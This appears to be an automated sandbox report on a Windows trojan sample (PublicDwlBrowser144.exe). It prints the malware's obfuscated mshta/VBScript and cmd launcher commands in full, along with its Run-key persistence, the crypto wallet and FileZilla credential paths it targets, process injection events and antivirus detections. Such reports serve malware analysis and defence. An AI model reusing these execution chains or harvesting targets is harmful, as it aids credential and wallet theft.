cmdline	MSHtA.exE vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
cmdline	"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F
cmdline	C:\Windows\System32\cmd.exe /q /C cOPy /Y "C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F
cmdline	"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
cmdline	MSHtA.exE vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\4446173.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\4446173.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))

Communicates with host for which no DNS query was performed (1 event)

host

172.217.161.164

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WinHost

reg_value

C:\Users\test22\AppData\Roaming\WinHost\WinHoster.exe

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Collects information about installed applications (27 events)

Time & API	Arguments	Status
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW Sept. 12, 2021, 3:11 p.m.	key_handle: 0x000006c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Appends a known CryptoMix ransomware file extension to files that have been encrypted (1 event)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 260 resumed a thread in remote process 844
Process injection	Process 844 resumed a thread in remote process 2664
NtResumeThread Sept. 12, 2021, 3:11 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 844	1	0	0
NtResumeThread Sept. 12, 2021, 3:11 p.m.	thread_handle: 0x000002b4 suspend_count: 1 process_identifier: 2664	1	0	0

File has been identified by 23 AntiVirus engines on VirusTotal as malicious (23 events)

Elastic	malicious (high confidence)
FireEye	Generic.mg.350591b477d78656
McAfee	RDN/Generic.rp
Cylance	Unsafe
Sangfor	Suspicious.Win32.Save.a
CrowdStrike	win/malicious_confidence_90% (W)
BitDefenderTheta	Gen:NN.ZemsilF.34142.im0@a4tHNii
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Packed.Confuser.AC suspicious
Kaspersky	HEUR:Trojan.MSIL.Crypt.gen
APEX	Malicious
Rising	Trojan.Kryptik/MSIL!1.D978 (CLASSIC)
Sophos	Generic ML PUA (PUA)
McAfee-GW-Edition	BehavesLike.Win32.Generic.cm
Ikarus	Trojan-Spy.MSIL.Agent
Microsoft	Trojan:Win32/Sabsik.TE.B!ml
Malwarebytes	MachineLearning/Anomalous.100%
Avast	Win32:TrojanX-gen [Trj]
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	Riskware/Application
AVG	Win32:TrojanX-gen [Trj]
Cybereason	malicious.7ae51a

PublicDwlBrowser144.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All